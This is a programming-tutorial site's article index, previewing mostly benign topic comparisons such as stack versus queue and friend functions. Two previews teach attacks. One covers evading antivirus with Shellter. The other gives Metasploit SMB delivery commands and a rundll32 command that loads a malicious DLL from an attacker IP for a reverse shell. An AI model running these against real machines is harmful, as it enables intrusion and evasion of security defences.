Article Categories
- All Categories
-
Data Structure
-
Networking
-
RDBMS
-
Operating System
-
Java
-
MS Excel
-
iOS
-
HTML
-
CSS
-
Android
-
Python
-
C Programming
-
C++
-
C#
-
MongoDB
-
MySQL
-
Javascript
-
PHP
Computer Programming Articles
Page 17 of 18
Difference Between Stack and Queue
In this post, we will understand the difference between Stack and Queue.StackThey are based on LIFO- Last In First Out.This means the element inserted at the end is the first element to get deleted.Insertion and deletion happen in a stack from one end only, i.e the top.Insert operation is known as ‘push’ operation.Delete operation is known as ‘pop’ operation.A pointer is used to access the list, it is known as ‘top’.The ‘top’ points to the last element of the list.It helps work with problems associated with recursion.Representation of Stack (LIFO)QueuesThey are based on FIFO- First In First Out.This means the ...
Read MoreDifference Between Applet and Application
In this post, we will understand the difference between Applet and Application.ApplicationThey are similar to Java programs.They can be executed independently without using web browser.It requires a ’main’ function for it to be executed.Java applications have full access to local file system and network.They can access all kinds of resources that are available to the system.They can execute the programs with the help of the local system.An application program is required when a task needs to be directly performed for the user.AppletsThey are small Java programs.They have been designed to be included with HTML documents.They need Java enabled web browser ...
Read MoreDifference Between Link and Association
In this post, we will understand the difference between Link and Association.LinkIt can be understood as the physical connection between objects.It helps tell about the relationship among objects.It is represented using line segment between objects.They can’t be referenced.It is used in UML designs.AssociationIt is a specification about the collection of links.The connections are related to classes.It is a general relationship between classes.They are implemented using programming languages as a reference model.It shows connections between classes using line segments.It is used in UML designs.
Read MoreDifference Between Friend Function and Friend Class
In this post, we will understand the difference between Friend function and Friend class.Friend FunctionIt is usually used with operator overloading operation.It is used with the ‘friend’ keyword.It helps give a non-member function the access to the private members of the class.It has to be declared before it is used.It is used to access private and protected members of the class.It can be a global function or a function in another class.Exampleclass Node { private: int val; Node* next; // Other members of Node Class // friend int LinkedList::search(); // Only search method ...
Read MoreDifference Between Server-side Scripting and Clientside Scripting
In this post, we will understand the difference between server-side scripting and client-side scripting.Server-side ScriptingIt helps work with the back end.It doesn’t depend on the client.It runs on the web server.It helps provide a response to every request that comes in from the user/client.This is not visible to the client side of the application.It requires the interaction with the server for the data to be process.Server side scripting requires languages such as PHP, ASP.net, ColdFusion, Python, Ruby on Rails.It is considered to be a secure way of working with applications.It can be used to customize web pages.It can also be ...
Read MoreDifference Between Linear Queue and Circular Queue
In this post, we will understand the difference between linear queue and circular queue −Linear QueueIt is a linear data structure, which data is arranged in a linear pattern.Operations such as insertion and deletion are done from rear and front respectively.It requires more memory, since data is stored in a linear fashion.The element that is added to a linear queue at first, is the element that gets deleted first.It follows FIFO, i.e first in first out.The element that is inserted first is the element that is deleted first as well.It is not as efficient as a circular queue structure.Circular QueueThe ...
Read MoreExplain the Difference Between Definition and Declaration
In this post, we will understand the difference between definition and declaration.DefinitionDefinition, with respect to a function indicates that the body of the function has been developed.With respect to variable, it means a value has been associated/defined with that variable.A function can be defined only once.Once a function or variable has been defined, it is ready to be used.A variable can be re-defined multiple times, as and when required. This depends on the language and the scopes.Memory is allocated when function or a variable is defined.Below is an example of variable definitionsum = 0A variable named ‘sum’ is assigned to ...
Read MoreBypass Antivirus with Shelter
Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.InstallationYou can install Shellter directly on Kali by using the following command −apt-get install shellterapt-get install wine32How to BypassOpen shelter using wine app, select the operation mode as 'a'.choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder ...
Read MoreRundll32.exe Attack
Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0
Read MoreMachine language program
Computer can understand only the language of Digital Electronics. Digital Electronics deals with presence and absence of voltages. Within the computer there are two logics can play their role. These logics are −Positive Logic − Here presence of voltage will be denoted by 1 and absence of voltage will be denoted by 0Negative Logic −Here presence of voltage will be denoted by 0 and absence of voltage will be denoted by 1But obviously computer can follow anyone of the logics at a time, not both the logics simultaneously. To make the computer understand, a program can be written using only ...
Read More